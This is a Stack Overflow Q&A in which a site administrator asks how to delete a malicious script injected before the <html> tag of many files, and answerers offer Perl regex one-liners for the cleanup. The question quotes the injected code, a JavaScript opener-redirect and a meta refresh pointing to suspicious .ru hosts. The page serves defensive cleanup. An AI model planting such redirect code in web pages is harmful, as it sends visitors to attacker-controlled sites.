How can I replace everything before the <html> tag with a Perl command?

Question

A folder on a webserver I manage was recently infected, and a malicious script was placed before the opening <html> tag on a whole mess of files. I'm trying to execute a perl string replace script to clean it out.

The malicious files look something like this:

<script language="JavaScript">
parent.window.opener.location="http://vkk.coom.ny8pbpk.ru?nhzwhhh=ZE9taWlsX2nkPRE0LmZub3ffaUQ9PTM3MCbjb0RlNWFlZnrvaEx2b2JydWLuYUJxfwC%3D%3D";
</script>
<meta http-equiv="refresh" content="0;URL=http://yandex.ru.ny8pbpk.ru?pk=i%2FGWhteXsNcf0qzPwdiVgMkkhvrG1YbO25gYgPqe2saQmdIDmeiUlsiXmNEQmPCfhMSD5" />
<html>
<head>
......and the file goes on

I'm something of a mess with Regex, and I've tried to glean as much as I can from other StackOverflow posts on how to use perl's string replace. The biggest issue I'm running into is making it work over multiple lines.

Here's what I have so far:

perl -0777 -i -pe 's/\s*<html>/<html>/s' index.html

This seems to have no effect. If I change the second <html> to <foobar> it correctly replaces with foobar, but it ignores everything in front of it.

From what I can tell, the -0777 flag is supposed to "slurp" as one line, and the \s* should match the entire string before <html>, but again, my regex is lacking. Any help is greatly appreciated!

Casimir et Hippolyte · Accepted Answer · 2013-07-13 11:37:40Z

2

Try this:

perl -0777 -i -pe 's/^.*(?=<html>)//s' index.html

or this more safer and effective pattern:

perl -0777 -i -pe 's/^(?>[^<]++|<(?!html>))*(?=<html>)//' index.html

edited Jul 13, 2013 at 11:37

answered Jul 13, 2013 at 1:56

Casimir et Hippolyte

90k5 gold badges102 silver badges131 bronze badges

Sign up to request clarification or add additional context in comments.

1 Comment

mirod Over a year ago

if the string '<html>' is not present in the infected part it's probably slightly safer to write s/^.*?(?=<html>)//s. This avoids deleting to much text if '<html>' is found somewhere in the body of the page (as in <p>Example of an html document:</p><pre><![CDATA[<html>blah blah...</html>]]></pre>). That's unlikely but who knows...

Jeanne Boyarsky · Accepted Answer · 2013-07-13 01:37:12Z

1

\s* is too specific. You don't only want to match whitespace before the . Try .* which matches everything before the

answered Jul 13, 2013 at 1:37

Jeanne Boyarsky

12.3k2 gold badges52 silver badges59 bronze badges

2 Comments

Ryan Erdmann Over a year ago

Thanks, this helped steer me onto the right track! The issue was that \s was only matching whitespaces. [\s\S] will match whitespace or non-whitespace, which is everything!

Jeanne Boyarsky Over a year ago

. (dot) does the same thing and is a more common pattern. Less code and what readers of your code are more likely to expect.

Ryan Erdmann · Accepted Answer · 2013-07-13 01:43:55Z

0

\s* should be [\s\S]* so it matches all characters.

I found this as a great reference: http://www.cs.tut.fi/~jkorpela/perl/regexp.html

So the final working command is:

perl -0777 -i -pe 's/[\s\S]*<html>/<html>/s' index.html

answered Jul 13, 2013 at 1:43

Ryan Erdmann

1,83612 silver badges12 bronze badges

Collectives™ on Stack Overflow

How can I replace everything before the <html> tag with a Perl command?

3 Answers 3

1 Comment

2 Comments

Comments

Your Answer

Hot Network Questions

Collectives™ on Stack Overflow

3 Answers 3

1 Comment

2 Comments

Comments

Your Answer

Sign up or log in

Post as a guest

Related